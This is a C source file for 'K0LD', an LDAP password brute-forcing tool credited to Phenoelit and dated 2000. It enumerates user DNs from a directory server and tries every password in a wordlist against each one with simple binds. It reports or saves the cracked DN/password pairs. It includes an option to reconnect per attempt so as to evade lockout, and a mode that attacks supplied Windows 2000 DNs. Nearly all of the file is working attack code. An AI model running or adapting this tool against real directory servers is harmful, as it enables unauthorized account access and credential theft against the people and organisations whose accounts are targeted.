/* Phenoelit's K0LD - the OPenLDAP implementation
 * 
 * FX of Phenoelit <fx@phenoelit.de>
 * (http://www.phenoelit.de/)
 * (c) 2k
 * 
 * $Id: ldapa.c,v 1.9 2000/11/30 08:27:06 fx Exp $ 
 */
#include "ldapa.h"

int main( int argc, char **argv )
{
    LDAP		*ldapd;
    LDAPMessage	*result; 
    char		*dn;
    char		*attrib,*attrlist[3],**attrvals;
    BerElement	*element;

    int		rer,rc;
    LDAPMessage	*res;

    char		option;
    extern char 	*optarg;

    struct configuration	config;

    /* init  */
    memset(&config,0,sizeof(config));
    /* specify attributes ! */
    attrlist[0]=(char *)malloc(strlen("uid")+1);
    attrlist[1]=(char *)malloc(strlen("cn")+1);
    bzero(attrlist[0],strlen("uid")+1);
    bzero(attrlist[1],strlen("cn")+1);
    strcpy(attrlist[0],"uid");
    strcpy(attrlist[1],"cn");
    attrlist[2]=NULL;

    while ((option=getopt(argc,argv,"vTIrh:b:w:p:f:o:D:W:F:"))!=EOF)
    {
	    switch (option) {
		    case '?': usage(argv[0]); break;
		    case ':': usage(argv[0]); break;
		    case 'v': config.verbose=1; break;
		    case 'T': config.test_only=1; break;
		    case 'r': config.reopen=1; break;
		    case 'I': config.info++; break;
		    case 'h': config.ldaphost=(char *)malloc(strlen(optarg)+1);
			      if (config.ldaphost==NULL) { 
				  printf("malloc() failed\n");
				  exit (-1);
			      }
			      bzero(config.ldaphost,strlen(optarg)+1);
			      strcpy(config.ldaphost,optarg);
			      break;
		    case 'b': config.basedn=(char *)malloc(strlen(optarg)+1);
			      if (config.basedn==NULL) { 
				  printf("malloc() failed\n");
				  exit (-1);
			      }
			      bzero(config.basedn,strlen(optarg)+1);
			      strcpy(config.basedn,optarg);
			      break;
		    case 'w': config.wordlist=(char *)malloc(strlen(optarg)+1);
			      if (config.wordlist==NULL) { 
				  printf("malloc() failed\n");
				  exit (-1);
			      }
			      bzero(config.wordlist,strlen(optarg)+1);
			      strcpy(config.wordlist,optarg);
			      break;
		    case 'f': config.filter=(char *)malloc(strlen(optarg)+1);
			      if (config.filter==NULL) { 
				  printf("malloc() failed\n");
				  exit (-1);
			      }
			      bzero(config.filter,strlen(optarg)+1);
			      strcpy(config.filter,optarg);
			      break;
		    case 'o': if ((config.resfile=(char*)malloc(
					      strlen(optarg)+1))==NULL) {
				  printf("malloc() failed\n");
				  exit (-1);
			      }
			      memset(config.resfile,0,strlen(optarg)+1);
			      strcpy(config.resfile,optarg);
			      break;
		    case 'D': if ((config.initial_bind=(char*)malloc(
					      strlen(optarg)+1))==NULL) {
				  printf("malloc() failed\n");
				  exit (-1);
			      }
			      memset(config.initial_bind,0,strlen(optarg)+1);
			      strcpy(config.initial_bind,optarg);
			      break;
		    case 'W': if ((config.initial_password=(char*)malloc(
					      strlen(optarg)+1))==NULL) {
				  printf("malloc() failed\n");
				  exit (-1);
			      }
			      memset(config.initial_password,0,
				      strlen(optarg)+1);
			      strcpy(config.initial_password,optarg);
			      break;
		    case 'F': if ((config.dnlist=(char*)malloc(
					      strlen(optarg)+1))==NULL) {
				  printf("malloc() failed\n");
				  exit (-1);
			      }
			      memset(config.dnlist,0,strlen(optarg)+1);
			      strcpy(config.dnlist,optarg);
			      break;
		    case 'p': if ((config.ldapport=strtoul(optarg,NULL,10))
				      ==0) { 
				  printf("port is bullshit\n");
				  exit (-1);
			      }
			      break;
	    }
    }

    /* test for not supplied options */
    if ((config.basedn==NULL)&&(config.dnlist==NULL))
	    usage(argv[0]);
    if (config.ldaphost==NULL) {
	    config.ldaphost=(char *)malloc(strlen(HOSTNAME)+1);
	    bzero(config.ldaphost,strlen(HOSTNAME)+1);
	    strcpy(config.ldaphost,HOSTNAME);
    }
    if (config.filter==NULL) {
	    config.filter=(char *)malloc(strlen(FILTER)+1);
	    bzero(config.filter,strlen(FILTER)+1);
	    strcpy(config.filter,FILTER);
    }
    if (config.wordlist==NULL) {
	config.test_only=1;
	printf("no wordlist - reverting to test mode\n");
    }
    if ((config.dnlist!=NULL)&&(config.test_only!=0)) {
	printf("Test mode dosn't makes sense with DN listings\n");
	exit(1);
    }


    /* verbose means verbose ;) */
    if (config.verbose) {
	    info();
	    printf("verbose mode on\n");
	    printf("Target: %s:%d\n",config.ldaphost,config.ldapport);
	    printf("Base DN: %s\n",config.basedn);
	    printf("Filter : %s\n",config.filter);
	    if (config.test_only)
		    printf("Single test query mode\n");
	    printf("Wordlist: %s\n",config.wordlist);
	    if (config.initial_bind!=NULL) {
		printf("Enum with DN: %s (%s)\n",config.initial_bind,
			config.initial_password);
	    }
	    if (config.dnlist) 
		printf("Testing DN from file: %s\n",config.dnlist);
    } else {
	info();
    }

    if (config.verbose+config.info) {
	    printf("connecting to %s:%d ...",config.ldaphost,config.ldapport);
	    fflush(stdout);
    }
    if ((ldapd=ldap_init(config.ldaphost,config.ldapport))==NULL) {
	    perror("ldap_init");
	    return (-1);
    }
    if (config.verbose+config.info) printf("connect\n"); else printf("\n");


    /* WIN2k patch 
     * if a DN list is requested, let's do it and exit right away.
     * It's not clean but the program was never designed to support this*/
    if (config.dnlist)
	scan_dnlist(config);



    if (config.initial_bind==NULL) {
	if (ldap_simple_bind_s(ldapd,NULL,NULL)!=LDAP_SUCCESS) {
		ldap_perror(ldapd,"ldap bind");
		return (-1);
	}
	if (config.verbose) 
	    printf("bound anonymous to LDAP server %s\n",config.ldaphost);
    } else {
	if (ldap_simple_bind_s(ldapd,
		    config.initial_bind,
		    config.initial_password)!=LDAP_SUCCESS) {
		ldap_perror(ldapd,"ldap bind (as user)");
		return (-1);
	}
	if (config.verbose) 
	    printf("bound as %s to LDAP server %s\n",
		    config.initial_bind,
		    config.ldaphost);
    }


    if (config.verbose) printf("Searching from DN %s with filter %s\n",
	    config.basedn,config.filter);

    if (ldap_search(ldapd,config.basedn,SCOPE,config.filter,
			    (char **)attrlist,0)<0)
    {
	    ldap_perror(ldapd,"ldap search sync");
	    return (-1);
    }
    if (config.verbose) printf("search accepted\n");

    while ((rc=ldap_result(ldapd,LDAP_RES_ANY,0,NULL,&res))
	    ==LDAP_RES_SEARCH_ENTRY) {
	result=ldap_first_entry(ldapd,res);

	if ((dn=ldap_get_dn(ldapd,result))!=NULL) {
	    if (!config.test_only)
		printf("Attacking DN '%s' ... ",dn);
	    else
		printf("%s\n",dn);
	    fflush(stdout);
	    /* GET UID */
	    attrib=ldap_first_attribute(ldapd,result,&element);
	    if (attrib==NULL) {
		    if (config.verbose) 
			ldap_perror(ldapd,"ldap_first_attribute (UID)");
	    } else {
		attrvals=ldap_get_values(ldapd,result,attrib);
		if (config.info)
		    printf("\n\tUID: %s\n",attrvals[0]);
		ldap_value_free(attrvals);

		/* GET FULL NAME (sn) */
		attrib=ldap_next_attribute(ldapd,result,element);
		if (attrib==NULL) {
		    if (config.verbose) 
			ldap_perror(ldapd,"ldap_first_attribute (SN)");
		} else {
		    attrvals=ldap_get_values(ldapd,result,attrib);
		    if (config.info)
			printf("\tSN: %s\n",attrvals[0]);
		    ldap_value_free(attrvals);
		}
	    } /* decoding error trap */

	    if (!config.test_only) {
		    switch (try_wordlist(dn,config)) {
			    case (-1): 
				       break;
			    case 0: if (config.verbose+config.info)
					printf("DN '%s' failed\n\n",dn);
				    else 
					printf("failed\n");
				    break;
			    case 1: if (config.resfile)
					printf("FOUND !\n");
				    break;
		    }
	    }

	    free(dn);
	}
	
    } /* end of result query */

    free(attrlist[0]);
    free(attrlist[1]);

    ldap_unbind(ldapd);
    if (config.verbose) printf("unbound from server\n");
    if (config.basedn) free(config.basedn);
    if (config.wordlist) free(config.wordlist);
    if (config.ldaphost) free(config.ldaphost);
    if (config.filter) free(config.filter);
    if (config.resfile) free(config.resfile);

    return 0;
}

int try_wordlist(char *dn,struct configuration c)
{
    FILE 	*fd;
    FILE	*rr;
    LDAP	*ld;
    char	*tryword;
    int	hit;

    if ((fd=fopen(c.wordlist,"rt"))==NULL) {
	    perror("fopen");
	    return (-1);
    }
    if (c.verbose)
	    printf("Wordlist %s open\n",c.wordlist);

    tryword=(char *)malloc(512);
    bzero(tryword,512);
    hit=0;

    if (!c.reopen) {
	if (c.info) printf("trying %s ... ",c.ldaphost);
	fflush(stdout);
	if ((ld=ldap_open(c.ldaphost,c.ldapport))==NULL) {
		perror("\nldap_open");
		return (-1);
	}
	if (c.info) printf("connected\n");
    }

    while ((fgets(tryword,511,fd)!=NULL)&&(!hit)) {
	tryword[strlen(tryword)-1]='\0';

	if (c.verbose) {
		printf("DN    : %s\n",dn);
		printf("Trying: %s\n",tryword);
	}

	if (c.reopen) {
	    if ((ld=ldap_open(c.ldaphost,c.ldapport))==NULL) {
		    perror("ldap_open");
		    return (-1);
	    }
	}
	if (ldap_simple_bind_s(ld,dn,tryword)==LDAP_SUCCESS) {
	    if (c.resfile) {
		if ((rr=fopen(c.resfile,"a+t"))==NULL) {
		    printf("opening file failed - reverting to stdout\n");
		    free(c.resfile);
		    c.resfile=NULL;
		} else {
		    fprintf(rr,"DN: %s\n",dn);
		    fprintf(rr,"PW: %s\n\n",tryword);
		    fclose(rr);
		}
	    } /* not resfile */
	    
	    if(!c.resfile) {	/* check again, may be we reverted */
		printf("\n==============================\n");
		printf("DN : %s\n",dn);
		printf("PW : %s\n",tryword);
		printf("==============================\n");
	    }
		hit=1;
	} else {
		if (c.verbose)
			ldap_perror(ld,"bind");
	}
	
	bzero(tryword,512);
	if (c.reopen)
	    ldap_unbind(ld);
    }

    if (!c.reopen)
	ldap_unbind(ld);

    free(tryword);
    fclose(fd);
    if (c.verbose)
	    printf("Wordlist closed\n");
    return hit;
}


void scan_dnlist(struct configuration c) {
#define MAXDNLENGTH	2048
    FILE	*dnl;
    char	*dnt;

    if ((dnl=fopen(c.dnlist,"rt"))==NULL) {
	fprintf(stderr,"DN list %s not found\n",c.dnlist);
	exit(1);
    }

    if ((dnt=(char *)malloc(MAXDNLENGTH+1))==NULL) {
	fprintf(stderr,"malloc() failed\n");
	exit(1);
    }

    while ((fgets(dnt,MAXDNLENGTH,dnl)!=NULL)) {
	dnt[strlen(dnt)-1]='\0';

	if (c.verbose) printf("(list)DN: %s\n",dnt);

	switch (try_wordlist(dnt,c)) {
		case (-1): 
			   break;
		case 0: if (c.verbose+c.info)
			    printf("DN '%s' failed\n\n",dnt);
			else 
			    printf("failed\n");
			break;
		case 1: if (c.resfile)
			    printf("FOUND !\n");
			break;
	}

    }

    fclose(dnl);
    exit(0);
}


void usage(char *pname)
{
    info();
    printf("usage: %s [-vrT] -w wordlist.txt [-h ldap.foobar.com] [-f '(uid=fx)'] -b 'ou=personal, o=foobar' \n",pname);
    printf(
	    "-w\tWordlist to try\n"
	    "-h\tTarget host\n"
	    "-p\tLDAP server port\n"
	    "-f\tLDAP search filter, default is (uid=*)\n"
	    "-b\tDN to start from\n"
	    "-r\treConnect for each try, helps against intruder knockout but\n"
	    	"\tis a heavy load for your host\n"
	    "-T\tjust test the tree contents\n"
	    "-v\tverbose\n"
	    "-I\tjust a little verbose\n"
	    "-o\twrite passwords in output file\n"
	    "Windows 2000 specials:\n"
	    "-D\tbind as this user for the enum insted of anonymous\n"
	    "-W\tuse this password for the -D user\n"
	    "-F\tuse these DNs to attack - don't enum\n"
	    );

    exit (1);
}

void info(void)
{
    printf("Project Codename: %s\n%s\n",PROJECT_NAME,"$Id: ldapa.c,v 1.9 2000/11/30 08:27:06 fx Exp $");
    printf("Developed by Phenoelit (http://www.phenoelit.de/) \n");
    printf("This program comes as it is. Use at your own risk.\n\n");
}
